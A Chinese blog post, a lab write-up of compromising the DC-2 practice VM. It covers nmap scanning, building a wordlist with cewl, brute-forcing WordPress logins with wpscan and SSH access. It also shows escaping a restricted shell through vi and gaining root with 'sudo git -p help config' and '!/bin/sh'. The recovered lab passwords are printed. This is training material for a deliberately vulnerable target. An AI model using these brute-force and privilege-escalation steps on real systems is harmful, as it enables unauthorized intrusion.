kali渗透CD-2

最新推荐文章于 2025-11-28 16:16:35 发布
原创 最新推荐文章于 2025-11-28 16:16:35 发布 · 987 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #linux #安全 #服务器

本文详细描述了在DC-2靶机上进行渗透测试的过程,包括信息收集、漏洞发现(如使用Nmap扫描、CEWL抓取密码)、漏洞利用(如SSH登录、权限提升尝试)、以及最终的提权方法(通过git提权获取flag)。

kali渗透DC-2

环境搭建

DC-2靶机搭建

DC-2镜像下载地址
教程大家自行C一下,我不多说了。

一.信息收集

寻找靶机的IP地址

arp-scan -l

DC-2的IP地址:192.168.178.227

扫描靶机开放端口

nmap -sT -p- --min-rate 2000 192.168.178.227

在这里插入图片描述
可以看到有80和7744端口开放

扫描靶机开放端口的服务

nmap -sV -T4 -O -p 80,7744 192.168.178.227

在这里插入图片描述
80是http服务,7744是ssh端口服务

二. 漏洞发现

访问网页

先修改hosts文件(Windows需要administrator用户权限)
C:/windows/system32/drivers/etc/hosts文件绑定IP地址和域名
在这里插入图片描述
访问http://dc-2
访问成功

使用drib工具扫描网页目录
在这里插入图片描述
可以看到wp-admin目录,反问试试

在这里插入图片描述
访问成功
破解一下试试
先修改kali中的hosts文件,绑定域名和IP(和windows一样)
使用cewl http://dc-2 -w pwd.txt 把网页上的英文字母下载下来生成pwd.txt密码字典

cewl http://dc-2 -w pwd.txt

在这里插入图片描述
扫描登录用户

wpscan --url dc-2 --enumerate

在这里插入图片描述
发现出现三个用户,把他们写入用户字典里面
在这里插入图片描述
尝试使用wordpress爆破

wpscan --url http://dc-2/ -U user.txt -P pwd.txt

在这里插入图片描述
密码到手

jerry;adipiscing
tom;parturient

再网页登陆界面登陆jerry的账号密码
在这里插入图片描述
发现了flag2

三.漏洞利用

tom用户登录(信息收集的时候我们扫描到DC-2的ssh7744端口开放)

ssh tom@192.168.178.227 -p 7744

在这里插入图片描述
登陆成功
但是发现不能使用任何命令,发现权限很低。

后来发现是靶机DC-2的环境变量有问题。使用export查看变量 受限shell是LinuxShell限制一些bash shell中的功能

export PATH=$PATH:/bin/

可以使用用vi编辑器穿件shell文件
用vi的末行模式下输入 ——> :set shell=/bin/bash
然后应用这个shell ——> : shell

在这里插入图片描述
在这里插入图片描述

四.提权

尝试sudo提权、SUID提权、/etc/passwd 、/etc/crontab、隐藏文件提权都不行。

所以现在尝试切换到jerry用户。

su jerry

在这里插入图片描述

在这里插入图片描述

flag提示git 提权

sudo git -p help config
!/bin/sh

使用whoami查看权限
然后进入根目录查找flag

cd /

find / -name *flag*

在这里插入图片描述

打开找到的文件

cat /root/final*

在这里插入图片描述
拿下!

精选资源
kali-linux-2021.3-vmware-amd64.part3.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
精选资源
kali-linux-2021.3-installer-amd64.part4.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
DC-2靶机进行渗透测试
zll___的博客
03-11 1192
DC-2靶机进行渗透测试
kali渗透DC-2
余笙.'的博客
11-27 667
kali渗透DC-2靶机
靶机-DC-2通关全过程
认真走好每一小步
06-18 601
其中,"^USER^"和"^PASS^"将在攻击过程中分别被替换为不同的用户名和密码,"wp-submit=LogIn"表示登录按钮的名称,"testcookie=1"表示要求服务器设置一个测试Cookie,而"S=location"表示如果攻击成功,就重定向到/target/路径下的网页。当一个用户使用rbash作为其默认shell时,该用户将被限制只能执行一些基本的命令,例如cd、ls和echo等,并且不能使用绝大多数的shell功能,如变量赋值、重定向、管道和通配符扩展等。
Kali渗透练习DC:2
qq_50905066的博客
03-24 3045
dc1相同我们先要下载靶机,配置靶机网卡为nat,打开靶机。启动Kali使用Namp扫描。 扫描完成后排除过大与过小的和本机的地址很容易得到靶机地址。得到地址后扫描靶机开启的端口与服务。 得到信息,靶机开启了80端口http服务,7744端口ssh服务。浏览器查看靶机http服务 发现无法链接,找不到dc-2的ip 地址,这是由于本机的dns服务无法解析地址。语言手动添加 这里是windows的路由添加。添加之后我们刷新dns 以后再次尝试浏览 成功打开,再打开的...
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 2861
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
精选资源
Kali-Linux-2024.4.zip
12-23
Kali Linux是基于Debian的Linux发行版,专注于安全审计、渗透测试和数字取证领域。它的设计初衷是为安全专家、渗透测试人员和道德黑客提供一个功能丰富的平台,用于各种安全相关的任务,包括但不限于安全测试、...
精选资源
kali-linux-2021.3-vmware-amd64.part1.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
精选资源
kali-linux-2021.3-installer-arm64.part2.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
DC-2完整的渗透测试过程
weixin_51097397的博客
07-04 1131
1.此次DC-2渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch④cewl⑤wpscan2.学到了修改本地hosts3.学会rbash逃逸BASH_CMDS [ r ] = /bin/bash #设置变量r为一个shell r #执行这个shell #添加环境变量 export PATH = $PATH :/bin/ export PATH = $PATH :/usr/bin/4.学会git提权。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 3166
DC-2靶机渗透测试思路及流程
DC-2靶机渗透
weixin_41082546的博客
08-11 4293
首先获取目标主机ip netdiscover -i eth0 -r 192.168.88.1/24 对端口进行扫描,只开放了web服务 于是访问web 这里配置本地dns解析,将目标ip地址添加进hosts 成功访问,发现是wordpress。 此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。 先使用dirb 做一个简单的目...
[渗透测试][Kali]对DC-2靶机进行渗透测试
多皮哦的博客
07-14 2252
DC-2靶机进行渗透测试 1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用wpscan进一步扫描 5.破解密码 6.登陆ssh 7.root权限提升 1.搭建渗透平台 Kali 2018, DC-2靶机, VMWare虚拟机平台 平台搭建工作不再赘述 2.准备工作 使用nmap扫描局域网中的主机 Bash shell命令 nmap -sn 192.168.11.0/24 Bash sh...
靶机渗透测试实战(二)——DC-2
weixin_45116657的博客
10-03 5494
1、确定目标主机、详细信息 1.1> 命令:arp-scan -l ——> 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)。它可以构造并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。设...
网闸的作用与功能:2025新型网闸全面介绍!
2501_93735104的博客
11-28 765
网闸的作用与功能,简单来说,就是安全隔离+数据交换,今天我们要重点说的一种新型网闸产品,是传统网闸+文件摆渡系统的结合体,以《Ftrans网络安全隔离与信息交换系统》为典型代表,不仅包含网闸隔离、协议玻璃、数据交换等功能,还支持面向用户的跨网文件传输,有效防止敏感信息泄露,提供多种传输方式、支持多种使用场景、增强数据安全性和合规性,降低运营成本。:提供全链路API集成管控能力。可控数据交换:隔离的同时,专门开一条唯一的、能管控的安全通道,解决 “完全断开就没法干活” 的问题,保证必要数据能安全交换。
自定义协议设计与实践:从协议必要性到JSON流式处理
最新发布
祯的博客
11-28 1072
本文探讨了自定义网络协议的必要性及其实现方法。首先分析了通用协议(如HTTP)的局限性:性能开销大、功能冗余、通信模式不匹配等问题。其次阐述了自定义协议的优势:极致性能、高度定制化、低资源消耗和增强安全性。文章详细介绍了自定义协议的应用场景(物联网、游戏、区块链等)和开发代价(高维护成本、调试困难等)。重点讲解了基于TCP的流式数据处理方法,提出"长度头+消息体"的解决方案,并给出基于jsoncpp的实现示例。
前端跨域解决方案
2509_93942660的博客
11-28 526
如果涉及带凭证的请求,比如cookie,还得加Access-Control-Allow-Credentials: true,并且Origin不能是通配符。原理很简单,前端请求发给同域的代理,代理再转发给目标服务器,绕过浏览器限制。比如,你页面里嵌了个第三方iframe,想和它通信,就可以用window.postMessage发消息,对方用message事件接收。JSONP适合老项目,CORS是首选标准,代理在开发时好用,WebSocket专攻实时,postMessage处理iframe问题。
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1504
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
kali安装beef-xss
08-23
根据用户提供的引用内容,我们并没有直接看到beef-xss的包名,但用户引用中提到了kali-tools-top10等,而BeEF是一个常用的渗透测试工具,通常包含在Kali中。 因此,我们首先尝试用apt安装。 安装步骤: 方法...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值